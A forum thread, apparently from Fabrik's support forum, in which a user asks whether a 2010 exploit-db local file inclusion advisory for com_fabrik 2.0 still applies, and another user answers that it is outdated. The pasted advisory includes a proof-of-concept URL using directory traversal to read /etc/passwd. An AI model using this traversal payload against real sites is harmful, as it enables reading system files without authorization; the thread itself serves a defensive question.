Local File Inclusion Vulnerability?

[alanstylez]

My system is being scanned by hacker bots for sql injection vulnerabilities and I need to know if Fabrik is still vulnerable to the Local File Inclusion Vulnerability described on exploit-db (and copied below). This is extremely urgent as the attack is ongoing...



============================================================================================================


[o] Joomla Component Fabrik Local File Inclusion Vulnerability

Software : com_fabrik version 2.0
Vendor : http://fabrikar.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[dot]antisecurity[dot]org
Home : http://antisecurity.org/


============================================================================================================


[o] Exploit

http://localhost/[path]/index.php?option=com_fabrik&controller=[LFI]


[o] PoC

http://localhost/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd


============================================================================================================


[o] Greetz

Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews s4va wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


============================================================================================================


[o] April 06 2010 - GMT +07:00 Jakarta, Indonesia

 

[felixkat]

Joomla Component Fabrik Local File Inclusion Vulnerability

Software : com_fabrik version 2.0

1) Your posting a Vulnerability for Joomla 1.5 \ Fabrik 2.x on the forums for Joomla 1.7 \ Fabrik 3.x BETA

2) Your information is dated April 06 2010, there have been roughly 2633 commits since then!

3) Fabrik Announcements http://fabrikar.com/forums/forumdisplay.php?f=55

4) SQL Injection update http://fabrikar.com/blog/73-fabrik-21-released



I think everything is covered.